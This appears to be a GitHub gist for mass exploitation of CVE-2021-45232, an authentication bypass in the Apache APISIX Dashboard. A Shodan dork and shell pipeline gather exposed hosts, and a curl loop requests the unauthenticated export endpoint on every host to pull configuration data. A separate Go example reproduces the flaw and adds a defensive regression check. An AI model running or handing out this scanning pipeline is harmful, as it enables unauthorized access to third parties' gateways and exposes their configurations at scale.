Created January 6, 2022 14:27
Mass exploitation of Apache APISIX Dashboard Unauthorized Access Vulnerability (CVE-2021-45232)
In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks: it introduces the `droplet` framework on top of the `gin` framework. All APIs and the authentication middleware are developed on `droplet`, but some APIs directly use the `gin` interface, thus bypassing authentication.
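The root cause described above, reduced to Go's standard `net/http` as an added example (not code from APISIX Dashboard or from this gist): a handler registered on the outer router never passes through the authentication wrapper, and `openPaths` is the kind of regression check that catches it. `requireToken`, `newManagerAPI`, `openPaths`, the token value and the `/apisix/admin/routes` path are assumptions made for the illustration; `gin` and `droplet` themselves are not used.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// requireToken stands in for the authentication middleware (hypothetical check).
func requireToken(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Header.Get("Authorization") != "constructed-token" {
			http.Error(w, "unauthorized", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func stub(w http.ResponseWriter, r *http.Request) { fmt.Fprint(w, "{}") }

// newManagerAPI: hardened=false registers export on the outer router, outside the authenticated one.
func newManagerAPI(hardened bool) http.Handler {
	authed, outer := http.NewServeMux(), http.NewServeMux()
	authed.HandleFunc("/apisix/admin/routes", stub)
	if hardened {
		authed.HandleFunc("/apisix/admin/migrate/export", stub)
	} else {
		outer.HandleFunc("/apisix/admin/migrate/export", stub)
	}
	outer.Handle("/", requireToken(authed))
	return outer
}

// openPaths lists paths that answer an unauthenticated GET with anything but 401.
func openPaths(h http.Handler, paths []string) []string {
	var open []string
	for _, p := range paths {
		rec := httptest.NewRecorder()
		h.ServeHTTP(rec, httptest.NewRequest(http.MethodGet, p, nil))
		if rec.Code != http.StatusUnauthorized {
			open = append(open, p)
		}
	}
	return open
}

var adminPaths = []string{"/apisix/admin/routes", "/apisix/admin/migrate/export"}

func main() { fmt.Println(openPaths(newManagerAPI(false), adminPaths), openPaths(newManagerAPI(true), adminPaths)) }
```

Run against a project's full route table in CI, a check of this shape fails the build as soon as any admin route is reachable without credentials.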
Shodan Dork: title="Apache APISIX Dashboard"
Run the command below to get a list of IPs running the Apache APISIX application
shodan search 'title="Apache APISIX Dashboard"' --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a temp.txt
cat temp.txt | httpx | tee -a url.txt
We will use the process below to automate the vulnerability scanning
cat url.txt | while read -r host; do curl --silent --path-as-is --insecure "$host/apisix/admin/migrate/export" | grep -qs 'Counsumers' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done
Check the vulnerable URL in a browser